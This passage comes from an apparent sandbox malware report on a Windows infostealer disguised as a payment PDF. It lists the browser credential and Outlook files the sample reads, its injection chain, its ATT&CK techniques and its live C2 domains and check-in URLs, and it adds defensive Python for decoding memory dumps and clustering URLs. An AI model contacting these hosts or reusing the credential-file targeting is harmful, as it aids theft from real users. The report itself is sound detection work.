            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 5.2.swift_payment_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.swift_payment_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match | File source: 5.2.swift_payment_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.swift_payment_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
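The same eight memory dumps carry the Yara hits in both the Stealing of Sensitive Information and the Remote Access Functionality lists above. Their dotted names say which process and which memory region the match landed in, and that is what turns a Yara hit into injection evidence: a detection inside a region that is executable but not backed by a loaded module is code that got there by being written or mapped, not by being loaded. The following is an added example in Python, not code from Joe Security or from this report. The field assignments it applies to the identifiers are an assumption inferred from the page (field 1 matches the process index used in names like 5.2.swift_payment_pdf.exe.400000.0.unpack, field 4 reads as the region base, field 5 as a Win32 page-protection value, field 7 as the region type); the dump list is copied from the entries above.

```python
"""Decode the dotted memory-dump identifiers used by the Yara-match entries, e.g.
    00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp

Added example; not tooling from Joe Security.  Field meanings are an ASSUMPTION
inferred from the page: field 1 = process index (as in 5.2.<name>.unpack),
field 2 = dump index, field 4 = region base address, field 5 = Win32 page
protection, field 7 = region type (MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE).
Fields 3, 6 and 8 are carried through raw and are not interpreted.
"""
from dataclasses import dataclass

# Win32 constants from winnt.h.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_IMAGE = 0x1000000
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# Dump identifiers copied from the Yara-match lists on this page.
SAMPLE_DUMP_IDS = [
    "00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp",
    "00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp",
    "00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp",
    "00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp",
    "00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp",
    "00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp",
    "00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp",
]


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    dump_index: int
    base: int
    protect: int
    mem_type: int
    raw_fields: tuple  # fields 3, 6 and 8, not decoded by this example

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def executable(self) -> bool:
        # All PAGE_EXECUTE* values live in the high nibble of the low byte.
        return bool(self.protect & 0xF0)

    @property
    def writable(self) -> bool:
        return (self.protect & 0xFF) in (0x04, 0x08, 0x40, 0x80)


def parse_dump_id(name: str) -> DumpRegion:
    """Split an 8-field dotted identifier (optional .sdmp suffix); fields are hex."""
    if name.endswith(".sdmp"):
        name = name[:-5]
    f = name.split(".")
    if len(f) != 8:
        raise ValueError(f"expected 8 dotted fields, got {len(f)}: {name}")
    return DumpRegion(
        process_index=int(f[0], 16),
        dump_index=int(f[1], 16),
        base=int(f[3], 16),
        protect=int(f[4], 16),
        mem_type=int(f[6], 16),
        raw_fields=(f[2], f[5], f[7]),
    )


def injection_candidates(dump_ids):
    """Regions where Yara matched executable memory that is not module-backed.
    Legitimately loaded PE images are MEM_IMAGE; executable MEM_PRIVATE or
    MEM_MAPPED memory is where written or section-mapped payloads live."""
    return [r for r in map(parse_dump_id, dump_ids)
            if r.executable and r.mem_type != MEM_IMAGE]


if __name__ == "__main__":
    for r in injection_candidates(SAMPLE_DUMP_IDS):
        print(f"process {r.process_index}: base 0x{r.base:08X} "
              f"{r.protect_name} {r.type_name}")
```

Under those assumptions six of the eight dumps decode to PAGE_EXECUTE_READWRITE regions that are MEM_PRIVATE or MEM_MAPPED rather than image-backed, across process indices 5, 6, 7 and 8; the two remaining hits are PAGE_READWRITE private memory (data, not code). Section-mapped RWX regions in several processes are consistent with the "Maps a DLL or memory area into another process" and explorer.exe injection signatures listed on this page.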
MITRE ATT&CK matrix (reconstructed from the flattened table; a number in parentheses is the count the report displays next to that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Process Injection (512); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (41); Process Injection (512); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Security Software Discovery (121); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (113); Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1467534; sample: swift_payment_pdf.exe; start date: 04/07/2024; architecture: WINDOWS; score: 100)

Start node: www.tofcomy.xyz, www.wwfglobal.com and 13 other IPs or domains. Signatures at this node: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 9 other signatures. Attached to www.tofcomy.xyz: Performs DNS queries to domains with low reputation.

1. swift_payment_pdf.exe (3), started. Dropped file: C:\Users\user\...\swift_payment_pdf.exe.log, ASCII. Signature: Injects a PE file into a foreign processes.
2. swift_payment_pdf.exe, started by 1. Signature: Maps a DLL or memory area into another process.
3. AbWHWpocGREf.exe, injected by 2. Signatures: Injects code into the Windows Explorer (explorer.exe); Found direct / indirect Syscall (likely to bypass EDR).
4. explorer.exe (13), started by 3. Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures.
5. AbWHWpocGREf.exe, injected by 4, and firefox.exe, started by 4.
   The injected AbWHWpocGREf.exe contacts www.cheapdesklamp.shop (194.195.220.41; 60632, 60633, 60634; NEXINTO-DE Germany), www.tofcomy.xyz (162.0.236.122; 60636, 60637, 60638; NAMECHEAP-NETUS Canada) and 5 other IPs or domains. Signature: Found direct / indirect Syscall (likely to bypass EDR).

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
Source | Detection | Scanner | Label
swift_payment_pdf.exe | 26% | Virustotal |
swift_payment_pdf.exe | 100% | Avira | HEUR/AGEN.1309958
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner
www.qaronvc.lol | 1% | Virustotal
www.piqia.top | 1% | Virustotal
chefmikesrecipes.com | 0% | Virustotal
td-ccm-neg-87-45.wixdns.net | 0% | Virustotal
alanbeanart.com | 0% | Virustotal
enagicwebsystem.com | 0% | Virustotal
www.alanbeanart.com | 0% | Virustotal
www.wepayassessments.com | 1% | Virustotal
www.wwfglobal.com | 0% | Virustotal
www.enrich-pet.com | 5% | Virustotal
www.chefmikesrecipes.com | 0% | Virustotal
Source | Detection | Scanner | Label
http://www.fontbureau.com/designersG | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/? | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.fontbureau.com/designers? | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
http://www.fontbureau.com/designers | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.fonts.com | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0 | 0% | URL Reputation | safe
http://www.fontbureau.com | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/cabarga.htmlN | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/frere-user.html | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.fontbureau.com/designers8 | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://www.wwfglobal.com | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
http://www.cheapdesklamp.shop/9nq7/?LtQxGF=3WbZRu4mrDqEA1Ay7ye2LS4QzFLdLuukgLPU+Ee+5nDYiFfgQ/T3sQVzU9oLEM0lY8+GADXgUVgfoHaw0lWmg2ENHn4ynM4ZVTokb9t9TCHuPL1ipqofA3g=&tDVH=AxaL | 100% | Avira URL Cloud | malware
http://www.tofcomy.xyz/gw8h/ | 0% | Avira URL Cloud | safe
http://www.wwfglobal.com | 0% | Virustotal |
https://duckduckgo.com/ac/?q= | 0% | Virustotal |
http://www.wwfglobal.com/awho/?LtQxGF=HKpMDSWn02c1DGWlTfaJmDPYGspDHxl4M+sEuBij/TeAVpD3A/HhJ2RP1Yj8RhfHV3diV9uQCX+MCoKzKJx/zvHqsAsi9iTf04+ql3hj2gWbzWPZwBcwMrc=&tDVH=AxaL | 0% | Avira URL Cloud | safe
http://www.piqia.top/rlze/ | 0% | Avira URL Cloud | safe
http://www.wwfglobal.com/awho/ | 0% | Avira URL Cloud | safe
http://www.cheapdesklamp.shop/9nq7/ | 100% | Avira URL Cloud | malware
http://www.qaronvc.lol/d8kh/ | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Virustotal |
http://www.piqia.top/rlze/?LtQxGF=aIyAcRArRtIGvQhfdflYxlfrxIZLeHRFwP1NsuYwxTNgARVeV6obq7xFZv4/a30th0BoYK05fy/0IwAkOE+OBI8+L6UIixinPDwn66JMG/Wbc84G9m2CbnU=&tDVH=AxaL | 0% | Avira URL Cloud | safe
http://www.alanbeanart.com/jdip/?LtQxGF=W2aYirCPXKJiAM+1zI/AgBHM8/N+99M0G00tOgURX8ZkKPjyDhoW8AacjBkWD6QeLNKPcx0xYFVxMGjx+jrAzlAoi3E+4FlvpErxWC7md5KahWwglUqmq9c=&tDVH=AxaL | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal |
http://soft.365jz.com/ | 0% | Avira URL Cloud | safe
https://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vR | 100% | Avira URL Cloud | malware
http://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRPczT41Pma1tHEzPhIwEcWnI00ZdIodjuVJj7fI0Qa0rGd4Hyi3029DaEicY=&tDVH=AxaL | 100% | Avira URL Cloud | malware
http://www.sakkal.com0 | 0% | Avira URL Cloud | safe
http://www.qaronvc.lol/d8kh/?LtQxGF=Dj9s4sQnIR+vsDnKwlk6Nlhqw7itdOFaW/ig+XnRtKCOHSdW0TDTG1cm2v2szq88ld3O918FFXWQyjmpenJ9MCf4z9ns+SbMecfFG1uyoV1oJcUCPfEdpdE=&tDVH=AxaL | 0% | Avira URL Cloud | safe
http://www.tofcomy.xyz/gw8h/?LtQxGF=zGt49IFm93SrBWz0hF/Exo3fFaLGg1tTuVJPwAsKzCbkUXUSx9Ko4qRJeqPE/lbiWQNCjazmLjusy2a3r/X1USIwM3t9fhEbscmQM7mJ8GSckJYgF9Mlv0Q=&tDVH=AxaL | 0% | Avira URL Cloud | safe
http://www.alanbeanart.com/jdip/ | 0% | Avira URL Cloud | safe
http://soft.365jz.com/ | 0% | Virustotal |
http://www.alanbeanart.com/jdip/ | 1% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.qaronvc.lol | 116.213.43.190 | true | true | | unknown
www.cheapdesklamp.shop | 194.195.220.41 | true | true | | unknown
www.piqia.top | 172.80.82.186 | true | true | | unknown
www.tofcomy.xyz | 162.0.236.122 | true | true | | unknown
chefmikesrecipes.com | 23.226.70.194 | true | true | | unknown
td-ccm-neg-87-45.wixdns.net | 34.149.87.45 | true | true | | unknown
alanbeanart.com | 3.33.130.190 | true | true | | unknown
enagicwebsystem.com | 52.1.217.30 | true | true | | unknown
www.wwfglobal.com | unknown | unknown | true | | unknown
www.alanbeanart.com | unknown | unknown | true | | unknown
www.wepayassessments.com | unknown | unknown | true | | unknown
www.enrich-pet.com | unknown | unknown | true | | unknown
www.chefmikesrecipes.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.cheapdesklamp.shop/9nq7/?LtQxGF=3WbZRu4mrDqEA1Ay7ye2LS4QzFLdLuukgLPU+Ee+5nDYiFfgQ/T3sQVzU9oLEM0lY8+GADXgUVgfoHaw0lWmg2ENHn4ynM4ZVTokb9t9TCHuPL1ipqofA3g=&tDVH=AxaL | true | Avira URL Cloud: malware | unknown
http://www.tofcomy.xyz/gw8h/ | true | Avira URL Cloud: safe | unknown
http://www.piqia.top/rlze/ | true | Avira URL Cloud: safe | unknown
http://www.wwfglobal.com/awho/?LtQxGF=HKpMDSWn02c1DGWlTfaJmDPYGspDHxl4M+sEuBij/TeAVpD3A/HhJ2RP1Yj8RhfHV3diV9uQCX+MCoKzKJx/zvHqsAsi9iTf04+ql3hj2gWbzWPZwBcwMrc=&tDVH=AxaL | true | Avira URL Cloud: safe | unknown
http://www.wwfglobal.com/awho/ | true | Avira URL Cloud: safe | unknown
http://www.cheapdesklamp.shop/9nq7/ | true | Avira URL Cloud: malware | unknown
http://www.qaronvc.lol/d8kh/ | true | Avira URL Cloud: safe | unknown
http://www.piqia.top/rlze/?LtQxGF=aIyAcRArRtIGvQhfdflYxlfrxIZLeHRFwP1NsuYwxTNgARVeV6obq7xFZv4/a30th0BoYK05fy/0IwAkOE+OBI8+L6UIixinPDwn66JMG/Wbc84G9m2CbnU=&tDVH=AxaL | true | Avira URL Cloud: safe | unknown
http://www.alanbeanart.com/jdip/?LtQxGF=W2aYirCPXKJiAM+1zI/AgBHM8/N+99M0G00tOgURX8ZkKPjyDhoW8AacjBkWD6QeLNKPcx0xYFVxMGjx+jrAzlAoi3E+4FlvpErxWC7md5KahWwglUqmq9c=&tDVH=AxaL | true | Avira URL Cloud: safe | unknown
http://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRPczT41Pma1tHEzPhIwEcWnI00ZdIodjuVJj7fI0Qa0rGd4Hyi3029DaEicY=&tDVH=AxaL | true | Avira URL Cloud: malware | unknown
http://www.qaronvc.lol/d8kh/?LtQxGF=Dj9s4sQnIR+vsDnKwlk6Nlhqw7itdOFaW/ig+XnRtKCOHSdW0TDTG1cm2v2szq88ld3O918FFXWQyjmpenJ9MCf4z9ns+SbMecfFG1uyoV1oJcUCPfEdpdE=&tDVH=AxaL | true | Avira URL Cloud: safe | unknown
http://www.tofcomy.xyz/gw8h/?LtQxGF=zGt49IFm93SrBWz0hF/Exo3fFaLGg1tTuVJPwAsKzCbkUXUSx9Ko4qRJeqPE/lbiWQNCjazmLjusy2a3r/X1USIwM3t9fhEbscmQM7mJ8GSckJYgF9Mlv0Q=&tDVH=AxaL | true | Avira URL Cloud: safe | unknown
http://www.alanbeanart.com/jdip/ | true | 1% Virustotal; Avira URL Cloud: safe | unknown
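Every host in the table above rates "safe" or scores 0 to 1 % on its own, yet the report still marks all of these URLs malicious. What per-URL reputation misses is that they share one generator: a four-character path segment and the same two query keys, LtQxGF and tDVH, on seven unrelated domains. The example below is added here and is not part of the Joe Sandbox report or of any Joe Security tooling. It clusters the page's URLs by that host- and value-independent shape, turns the resulting cluster into a URL signature plus a host list, and runs both over a few proxy log lines. The URLs are copied from the table above; the proxy log lines, the example-shop.test host and the min_hosts threshold are constructed for the demonstration.

```python
"""Cluster check-in URLs by shape (path segment lengths + sorted query keys)
instead of by host, then reuse the learned shape against proxy logs.

Added example, not part of the Joe Sandbox report.  SAMPLE_URLS are copied
from the page; PROXY_LOG is CONSTRUCTED for the demo and the min_hosts
threshold is an assumption.
"""
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# The 13 malicious URLs from the report plus three browser URLs from the same
# page as benign controls.
SAMPLE_URLS = [
    "http://www.cheapdesklamp.shop/9nq7/?LtQxGF=3WbZRu4mrDqEA1Ay7ye2LS4QzFLdLuukgLPU+Ee+5nDYiFfgQ/T3sQVzU9oLEM0lY8+GADXgUVgfoHaw0lWmg2ENHn4ynM4ZVTokb9t9TCHuPL1ipqofA3g=&tDVH=AxaL",
    "http://www.tofcomy.xyz/gw8h/",
    "http://www.piqia.top/rlze/",
    "http://www.wwfglobal.com/awho/?LtQxGF=HKpMDSWn02c1DGWlTfaJmDPYGspDHxl4M+sEuBij/TeAVpD3A/HhJ2RP1Yj8RhfHV3diV9uQCX+MCoKzKJx/zvHqsAsi9iTf04+ql3hj2gWbzWPZwBcwMrc=&tDVH=AxaL",
    "http://www.wwfglobal.com/awho/",
    "http://www.cheapdesklamp.shop/9nq7/",
    "http://www.qaronvc.lol/d8kh/",
    "http://www.piqia.top/rlze/?LtQxGF=aIyAcRArRtIGvQhfdflYxlfrxIZLeHRFwP1NsuYwxTNgARVeV6obq7xFZv4/a30th0BoYK05fy/0IwAkOE+OBI8+L6UIixinPDwn66JMG/Wbc84G9m2CbnU=&tDVH=AxaL",
    "http://www.alanbeanart.com/jdip/?LtQxGF=W2aYirCPXKJiAM+1zI/AgBHM8/N+99M0G00tOgURX8ZkKPjyDhoW8AacjBkWD6QeLNKPcx0xYFVxMGjx+jrAzlAoi3E+4FlvpErxWC7md5KahWwglUqmq9c=&tDVH=AxaL",
    "http://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRPczT41Pma1tHEzPhIwEcWnI00ZdIodjuVJj7fI0Qa0rGd4Hyi3029DaEicY=&tDVH=AxaL",
    "http://www.qaronvc.lol/d8kh/?LtQxGF=Dj9s4sQnIR+vsDnKwlk6Nlhqw7itdOFaW/ig+XnRtKCOHSdW0TDTG1cm2v2szq88ld3O918FFXWQyjmpenJ9MCf4z9ns+SbMecfFG1uyoV1oJcUCPfEdpdE=&tDVH=AxaL",
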